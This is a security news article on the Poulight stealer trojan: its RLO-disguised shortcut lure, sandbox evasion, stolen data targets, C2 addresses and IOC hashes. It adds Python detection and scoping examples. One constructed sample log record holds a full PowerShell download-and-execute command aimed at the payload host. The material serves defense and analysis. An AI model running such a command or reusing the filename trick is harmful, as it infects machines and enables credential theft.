360 Security Reports “TXT File” That Can Steal All Your Secrets


360 Security Center’s threat team detected an email phishing campaign that delivers the Poulight Trojan, an information stealer that exfiltrates a wide array of data.

360 Security Center’s threat monitoring platform has been tracking Poulight Trojan since last year and presented its findings in a report last Friday.

The 360 researchers say the trojan has “complete and powerful functions” and that the current campaign showed that it has begun to spread overseas.

The attack starts with a phishing file that abuses the Unicode Right-to-Left Override (RLO) character, U+202E. Everything after an RLO in a file name is rendered reversed, so a name whose real tail reads “txt.lnk” is displayed as “knl.txt”. The file therefore shows up on the user’s computer as “ReadMe_knl.txt”, although 360 gives its original name as “ReadMe_txt.lnk.lnk”: it is a Windows shortcut (.lnk), not a text file.

In addition, the attacker can set the icon of the .lnk file to the Notepad icon, so that the user is even more likely to mistake it for a benign .txt file. Windows Explorer never displays the .lnk extension, even with “hide extensions” turned off, so the file’s Properties dialog (type: Shortcut) is the reliable tell.

Image: 360 Security
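The following is an added example (not code from the report or from 360) that shows the RLO trick from the inspecting side: it approximates what a bidi-unaware file listing would display, strips the override characters to recover the real extension, and flags names where the displayed and actual extensions disagree. The sample file name is constructed to match the report’s description; the list of executable extensions is an assumption.

```python
import os

RLO = "\u202e"  # Unicode RIGHT-TO-LEFT OVERRIDE, the character abused by the Poulight lure
# Other bidi control characters that can be used for the same trick
BIDI_CONTROLS = {"\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
                 "\u2066", "\u2067", "\u2068", "\u2069", "\u200e", "\u200f"}
# Extensions that execute on double-click (assumed list); a name that *looks* like .txt
# but really ends in one of these is a lure
EXECUTABLE_EXTS = {".lnk", ".exe", ".scr", ".com", ".bat", ".cmd", ".js", ".vbs",
                   ".hta", ".ps1", ".pif"}


def rendered_name(name: str) -> str:
    """Approximate what a file listing shows: characters after an RLO are drawn
    right-to-left, i.e. reversed. Real renderers apply the full Unicode bidi
    algorithm, but for plain ASCII file names the result is the same."""
    if RLO not in name:
        return name
    head, _, tail = name.partition(RLO)
    return head + tail[::-1]


def strip_bidi(name: str) -> str:
    """Remove every bidi control character to get the name the filesystem actually has."""
    return "".join(ch for ch in name if ch not in BIDI_CONTROLS)


def inspect_filename(name: str) -> dict:
    """Return what the user sees, what the filesystem has, and whether they disagree dangerously."""
    actual = strip_bidi(name)
    ext = os.path.splitext(actual)[1].lower()
    has_bidi = actual != name
    return {
        "displayed": rendered_name(name),
        "actual": actual,
        "extension": ext,
        "suspicious": has_bidi and ext in EXECUTABLE_EXTS,
    }


def find_lures(names):
    """Filter file names (e.g. attachment names from a mail gateway) down to RLO lures."""
    return [r for r in (inspect_filename(n) for n in names) if r["suspicious"]]


if __name__ == "__main__":
    # Constructed sample, not the actual attachment: an RLO inserted before "txt.lnk"
    lure = "ReadMe_" + RLO + "txt.lnk"
    for key, value in inspect_filename(lure).items():
        print(f"{key:>10}: {value!r}")
```

Run stand-alone it prints the displayed name “ReadMe_knl.txt” next to the actual name “ReadMe_txt.lnk” and marks the file as suspicious; the same check is cheap enough to run on every attachment name at a gateway.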

When the user opens the fake txt file, the shortcut runs the attacker’s command instead: a PowerShell command downloads and executes the malicious program from https[:]//iwillcreatemedia[.]com/build.exe.

The malware developer did not obfuscate the code inside the downloaded program, which carries the straightforward name Poullight.exe.

The malware also downloads a file named putty3.exe, which first checks whether it is running inside a virtual machine or a malware-analysis environment. If it is, it stops running. In this way the operators evade analysis by some automated sandboxes.

After running the checks, the trojan starts to execute its malicious payloads.

Poullight then collects and stores locally in files the following data: user name, machine name, operating system, installed anti-virus products, graphics-card and processor labels, and other machine information. After that it gets the list of currently running processes and writes it to %LocalAppData%\1z9sq09u\ProcessList.txt.

After a few more manipulations, Poulight proceeds to steal the following data:

  • Desktop screenshot;
  • Documents whose file name contains any of the words password, login, account, аккаунт, пароль, вход, важно, сайта or site, or whose extension is .txt, .rtf, .log, .doc, .docx, .rdp or .sql;
  • Pictures from the web camera;
  • FileZilla server login credentials: FileZilla\recentservers.xml;
  • Pidgin login configuration: .purple\accounts.xml;
  • Discord data storage: discord\Local Storage;
  • Telegram data storage files;
  • Skype data: Microsoft\Skype for Desktop\Local Storage;
  • Various cryptocurrency-wallet related files;
  • Browsing history (URLs), cookies, saved accounts and passwords, autofill data and payment-card information from 25 browsers;
  • And more.
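As an added example (not code from the report or from 360), the document-targeting rule above written as a scoping check: during response it answers which files on a host the stealer would have picked up, using the report’s keyword and extension lists. The name check is a case-insensitive substring match, which is why a harmless “website-mockup.png” is also caught by “site”. The sample inventory is constructed.

```python
import re
from typing import Iterable, Optional

# Keyword and extension lists as given in the report
KEYWORDS = ["password", "login", "account", "аккаунт", "пароль", "вход", "важно", "сайта", "site"]
EXTENSIONS = {".txt", ".rtf", ".log", ".doc", ".docx", ".rdp", ".sql"}


def basename(path: str) -> str:
    """Last path component, accepting both Windows and POSIX separators."""
    return re.split(r"[\\/]", path)[-1]


def targeting_reason(path: str) -> Optional[str]:
    """Return why the stealer would take this file, or None if it would not.
    casefold() makes the Cyrillic keywords match regardless of case, like the ASCII ones."""
    name = basename(path)
    folded = name.casefold()
    for kw in KEYWORDS:
        if kw.casefold() in folded:
            return f"keyword:{kw}"
    dot = name.rfind(".")
    ext = name[dot:].casefold() if dot > 0 else ""
    if ext in EXTENSIONS:
        return f"extension:{ext}"
    return None


def scope_exposure(paths: Iterable[str]) -> dict:
    """Map every matching path to the rule that caught it. The caller supplies the file
    inventory (directory walk, forensic image listing); that input is an assumption here."""
    hits = {}
    for p in paths:
        reason = targeting_reason(p)
        if reason:
            hits[p] = reason
    return hits


if __name__ == "__main__":
    # Constructed sample inventory, not data from the incident
    sample = [
        r"C:\Users\u\Desktop\Пароли от сайта.odt",
        r"C:\Users\u\Desktop\holiday.jpg",
        r"C:\Users\u\Documents\website-mockup.png",
        r"C:\Users\u\Documents\notes.TXT",
        r"C:\Users\u\Documents\prod.rdp",
    ]
    for path, why in scope_exposure(sample).items():
        print(f"{why:<16} {path}")
```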

The trojan uploads the stolen data to a C&C server at http[:]//gfl.com[.]pk/Panel/gate.php; a second C&C address, http[:]//poullight[.]ru/handle.php, is present in the sample but unused.

360 Total Security researchers reported the following IOCs for Poullight:

Hash (MD5)

dcb4dfc4c91e5af6d6465529fefef26f

083119acb60804c6150d895d133c445a

b874da17a923cf367ebb608b129579e1

C2

hxxp://gfl.com.pk/Panel/gate.php

hxxp://poullight.ru/handle.php (unused)

URL

hxxps://iwillcreatemedia.com/build.exe

hxxp://ru-uid-507352920.pp.ru/example.exe
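The following is an added example (not code from the report or from 360) that turns the delivery step described earlier and the IOC list above into a hunting check over process-creation records: it flags PowerShell launched from explorer.exe (what a double-clicked shortcut looks like), a download-and-execute cradle in the command line, a fetched .exe, and any of the C2/URL hosts from the IOC list. The report does not give the exact PowerShell command the shortcut ran, so the cradle in the sample record is a generic one and an assumption; the sample records are constructed, with Sysmon Event ID 1 field names.

```python
import re
from urllib.parse import urlparse

# C2 and payload hosts from the IOC list, refanged for matching
IOC_HOSTS = {"iwillcreatemedia.com", "ru-uid-507352920.pp.ru", "gfl.com.pk", "poullight.ru"}
# Common PowerShell download/execute primitives (assumed; the report does not name the cradle)
CRADLE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer"
                    r"|\bcurl\b|\bwget\b|invoke-expression|\biex\b", re.I)
URL = re.compile(r"https?://[^\s'\"()<>]+", re.I)
SHELLS = ("powershell.exe", "pwsh.exe")


def refang(s: str) -> str:
    """Undo the hxxp / [.] defanging used in IOC lists so URLs can be parsed."""
    return s.replace("[.]", ".").replace("hxxp", "http")


def analyse_event(ev: dict) -> list:
    """Return the reasons a process-creation record looks like the Poulight delivery chain
    (an empty list means nothing matched). Only PowerShell launches are considered."""
    image = ev.get("Image", "").lower()
    parent = ev.get("ParentImage", "").lower()
    cmd = refang(ev.get("CommandLine", ""))
    reasons = []
    if not image.endswith(SHELLS):
        return reasons
    if parent.endswith("explorer.exe"):
        reasons.append("powershell spawned by explorer.exe (user double-clicked something)")
    if CRADLE.search(cmd):
        reasons.append("download/execute cradle in command line")
    for url in URL.findall(cmd):
        parsed = urlparse(url)
        host = (parsed.hostname or "").lower()
        if host in IOC_HOSTS:
            reasons.append(f"known Poulight IOC host: {host}")
        if parsed.path.lower().endswith(".exe"):
            reasons.append(f"fetches an executable: {url}")
    return reasons


def triage(events):
    """Keep only the records that produced at least one reason."""
    out = []
    for ev in events:
        reasons = analyse_event(ev)
        if reasons:
            out.append((ev, reasons))
    return out


# Constructed sample records (not real telemetry); the first mimics the lure being opened
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -c (New-Object Net.WebClient).DownloadFile("
                    "'https://iwillcreatemedia.com/build.exe','build.exe'); Start-Process build.exe"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-ChildItem C:\\Logs"},
]

if __name__ == "__main__":
    for ev, reasons in triage(SAMPLE_EVENTS):
        print(ev["CommandLine"][:60])
        for r in reasons:
            print("  -", r)
```

The explorer.exe parent on its own is noisy (any shortcut does that), so the check only reports, and the combination of parent, cradle and IOC host is what makes a record worth a ticket.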

About the author

CIM Team


CyberIntelMag is the trusted authority in cybersecurity, comprised of leading industry experts for over 20 years, dedicated to serving cybersecurity professionals. Our goal is to provide a one-stop shop for knowledge and insight needed to navigate throughout today’s emerging cybersecurity landscape through in-depth coverage of breaking news, tutorials, product reviews, videos and industry influencers.
